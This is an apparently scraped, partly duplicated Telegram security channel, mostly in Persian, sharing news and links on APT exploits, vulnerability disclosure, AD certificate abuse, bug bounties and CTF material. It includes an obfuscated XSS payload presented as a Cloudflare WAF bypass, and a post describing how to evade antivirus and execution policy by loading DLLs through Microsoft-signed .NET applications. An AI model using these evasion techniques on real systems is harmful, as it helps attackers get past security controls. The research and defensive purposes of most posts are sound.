لیست اکسپلویت های که APT گروه های چینی از سال 2021 تاکنون گمان میرود استفاده کردند
گزارش recorded future
https://www.recordedfuture.com/charting-chinas-climb-leading-global-cyber-power
@Engineer_Computer
گزارش recorded future
https://www.recordedfuture.com/charting-chinas-climb-leading-global-cyber-power
@Engineer_Computer
12 تا 20 سال حبس در انتظار هکر روسی که به ارتش سایبری اوکراین کمک میکرد و توسط سرویس fsb دستگیر شده است.
https://t.co/Vepil0tlAA
@Engineer_Computer
https://t.co/Vepil0tlAA
@Engineer_Computer
BleepingComputer
FSB arrests Russian hackers working for Ukrainian cyber forces
Russia's security agency published a press release on Tuesday saying that its officers detained two hackers who either assisted or joined Ukraine's hackers in cyber operations.
یک مقاله تحقیقاتی ارزشمند در خصوص مشکلات در فرآیند مدیریت آسیب پذیری در جهان
https://blog.aquasec.com/50-shades-of-vulnerabilities-uncovering-flaws-in-open-source-vulnerability-disclosures
@Engineer_Computer
https://blog.aquasec.com/50-shades-of-vulnerabilities-uncovering-flaws-in-open-source-vulnerability-disclosures
@Engineer_Computer
Aqua
50 Shades of Vulnerabilities: Uncovering Flaws in Open-Source Vulnerability Disclosures
Nautilus researchers evaluated the disclosure process of open-source projects and found flaws that allowed harvesting the vulnerabilities before patched
سوء استفاده از ابزار سرویس سرتیفیکیت اکتیو
https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-3/
@Engineer_Computer
https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-3/
@Engineer_Computer
Black Hills Information Security, Inc.
Abusing Active Directory Certificate Services (Part 3) - Black Hills Information Security, Inc.
| Alyssa Snow In PART ONE and PART TWO of this blog series, we discussed common misconfigurations of Active Directory certificate templates. In this post, we will walk through exploitation […]
🗒 Cloudflare bypass WAF
Payload:
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
@Engineer_Computer
Payload:
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
@Engineer_Computer
🗒 Telegram bug bounties XSS, privacy issues, official bot exploitation
https://davtur19.medium.com/telegram-bug-bounties-xss-privacy-issues-official-bot-exploitation-and-more-5277fa78435
@Engineer_Computer
https://davtur19.medium.com/telegram-bug-bounties-xss-privacy-issues-official-bot-exploitation-and-more-5277fa78435
@Engineer_Computer
🗒 3 tricks to bypass Cloudflare WAF in file upload
https://medium.com/numen-cyber-labs/3-tricks-to-bypass-cloudflare-waf-in-file-upload-9abb83530cfc
@Engineer_Computer
https://medium.com/numen-cyber-labs/3-tricks-to-bypass-cloudflare-waf-in-file-upload-9abb83530cfc
@Engineer_Computer
Medium
3 tricks to bypass Cloudflare WAF in file upload
For Cloudflare customers, having Cloudflare is like paying a peace of mind insurance that your system will get 99% protection against…
This media is not supported in your browser
VIEW IN TELEGRAM
RCE of Burp Scanner / Crawler via Clickjacking
https://hackerone.com/reports/1274695
@Engineer_Computer
https://hackerone.com/reports/1274695
@Engineer_Computer
Handbook for CTFers.pdf
45.9 MB
🗒 Handbook for CTF
@Engineer_Computer
@Engineer_Computer
⭕️ یکی از راه های دور زدن execution policy و AV ها استفاده از فایل های SIGN شده توسط کمپانی های معتبر است.
در لینک زیر یک لیست مناسب از Net Application. های مورد تایید Microsoft جمع آوری شده ، که ما میتوانیم با استفاده از فایل های Config. فایل های DLL را فراخوانی کنیم به طوری که از قبل مورد تایید قرار گرفته باشد.
https://github.com/Mr-Un1k0d3r/.NetConfigLoader
#RedTeam #MalDev
@Engineer_Computer
در لینک زیر یک لیست مناسب از Net Application. های مورد تایید Microsoft جمع آوری شده ، که ما میتوانیم با استفاده از فایل های Config. فایل های DLL را فراخوانی کنیم به طوری که از قبل مورد تایید قرار گرفته باشد.
https://github.com/Mr-Un1k0d3r/.NetConfigLoader
#RedTeam #MalDev
@Engineer_Computer
GitHub
GitHub - Mr-Un1k0d3r/.NetConfigLoader: .net config loader
.net config loader. Contribute to Mr-Un1k0d3r/.NetConfigLoader development by creating an account on GitHub.
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ افزونه ی مرورگر AI nuclei
قبلا سرویس Nuclei AI رو در کانال معرفی کرده بودیم.
حال، افزونه Nuclei AI میتواند با انتخاب کردن متن CVE های جدید در توییتر (یا صفحات وب دیگر) از سرویس Nuclei AI استفاده کند و تمپلیت nuclei مورد نظر را بسازد.
اپشن های این افزونه عبارتند از:
- تبدیل گزارش باگ بانتی HackerOne به تمپلیت Nuclei ( همچنین پشتیبانی برای پلتفرم های دیگر مانند BugCrowd / Intigriti / Synack نیز اضافه میشود )
- تبدیل اکسپلویت های ExploitDB به تمپلیت Nuclei
لینک افزونه:
🔗 https://github.com/projectdiscovery/nuclei-ai-extension
#nuclei #automation
@Engineer_Computer
قبلا سرویس Nuclei AI رو در کانال معرفی کرده بودیم.
حال، افزونه Nuclei AI میتواند با انتخاب کردن متن CVE های جدید در توییتر (یا صفحات وب دیگر) از سرویس Nuclei AI استفاده کند و تمپلیت nuclei مورد نظر را بسازد.
اپشن های این افزونه عبارتند از:
- تبدیل گزارش باگ بانتی HackerOne به تمپلیت Nuclei ( همچنین پشتیبانی برای پلتفرم های دیگر مانند BugCrowd / Intigriti / Synack نیز اضافه میشود )
- تبدیل اکسپلویت های ExploitDB به تمپلیت Nuclei
لینک افزونه:
🔗 https://github.com/projectdiscovery/nuclei-ai-extension
#nuclei #automation
@Engineer_Computer
https://www.tecmint.com/online-cron-job-generator-and-tester-for-linux/
#linux
#usefull_links
@Engineer_Computer
#linux
#usefull_links
@Engineer_Computer
5 Online Tools for Generating and Testing Cron Jobs for Linux
5 Best Online Cron Job Generators for Linux
As a Linux system administrator, you can perform time-based scheduling of jobs using online cron job services or Cron, a powerful utility in Unix/Linux systems.
Blue_Team_Ralfkairos.pdf
13.2 MB
A very complete collection of cheatsheet for #blue_team operations
#cheatsheet
Dm for copyright violations
@Engineer_Computer
#cheatsheet
Dm for copyright violations
@Engineer_Computer